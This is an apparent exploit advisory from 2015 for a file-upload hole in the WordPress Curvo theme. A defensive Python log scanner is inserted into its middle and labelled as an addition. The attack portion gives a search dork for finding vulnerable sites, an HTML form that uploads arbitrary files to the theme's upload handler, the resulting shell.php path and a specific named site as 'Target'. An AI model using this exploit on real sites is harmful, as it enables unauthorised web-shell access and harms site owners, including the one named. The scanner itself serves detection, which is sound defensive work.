WordPress Curvo Themes Vulnerability

Author: AnoaGhost, Published: 24-05-2015

Title : [New] WordPress Curvo Themes File Upload Vulnerability
Author : AnoaGhost
Homepage : www.anon-coders.party
Tested On : Windows, Linux, Mobile, etc.

=========================

Dork : inurl:wp-content/themes/curvo_v1.4.3/

Poc : http://www.site.com/path/wp-content/themes/curvo_v1.4.3/functions/upload-handler.php

Exploit :
<form enctype="multipart/form-data"
action="http://www.site.com/path/wp-content/themes/curvo_v1.4.3/functions/upload-handler.php" method="post">
Your File: <input name="uploadfile" type="file" />
<input type="submit" value="upload" />
</form>

Shell access : site.com/wp-content/upload/[year]/[month]/shell.php
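
Added example, not part of the original advisory: a defender-side log check in Python that flags requests to the upload handler named above and requests for script files under the dated upload directory. The log lines are constructed samples in combined log format; the function name scan and the finding labels are assumptions.

```python
import re

# Combined-log-format line: client IP ... "METHOD path HTTP/x" status
LINE_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# The theme upload handler named in the advisory (any theme directory name).
HANDLER_RE = re.compile(
    r'/wp-content/themes/[^/]+/functions/upload-handler\.php', re.I)
# A script file requested from the dated upload directory ("Shell access" path).
UPLOADED_SCRIPT_RE = re.compile(
    r'/wp-content/uploads?/\d{4}/\d{2}/[^/?]+\.(?:php\d?|phtml|phar)(?:[/?]|$)',
    re.I)

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [24/May/2015:10:01:02 +0000] "GET /wp-content/themes/curvo_v1.4.3/style.css HTTP/1.1" 200 5120',
    '198.51.100.23 - - [24/May/2015:10:02:10 +0000] "POST /wp-content/themes/curvo_v1.4.3/functions/upload-handler.php HTTP/1.1" 200 41',
    '198.51.100.23 - - [24/May/2015:10:02:15 +0000] "GET /wp-content/uploads/2015/05/shell.php HTTP/1.1" 200 312',
    '203.0.113.7 - - [24/May/2015:10:03:00 +0000] "GET /wp-content/uploads/2015/05/logo.png HTTP/1.1" 200 20480',
    '203.0.113.9 - - [24/May/2015:10:04:00 +0000] "GET /wp-content/upload/2015/05/x.php?a=1 HTTP/1.1" 404 0',
]

def scan(lines):
    """Return (line_no, client_ip, finding, http_status) for suspicious requests."""
    findings = []
    posted = set()  # clients that have POSTed to the upload handler
    for n, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, path = m["ip"], m["method"], m["path"]
        status = int(m["status"])
        if HANDLER_RE.search(path):
            if method == "POST":
                posted.add(ip)
                findings.append((n, ip, "upload-handler-post", status))
            else:
                findings.append((n, ip, "upload-handler-probe", status))
        elif UPLOADED_SCRIPT_RE.search(path):
            kind = ("script-in-uploads-after-post" if ip in posted
                    else "script-in-uploads")
            findings.append((n, ip, kind, status))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 status on a script-in-uploads finding means a script under the upload directory was actually served. The corresponding mitigations are removing or access-restricting the handler file and denying script execution in the upload directory.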

Target : www.polychemie.co.id/wp-content/themes/curvo_v1.4.3/functions/upload-handler.php

Greetz : Official Member of AnonCoders Team - Indonesian Security Tester - Indonesian Cyber Army - People Muslims - And You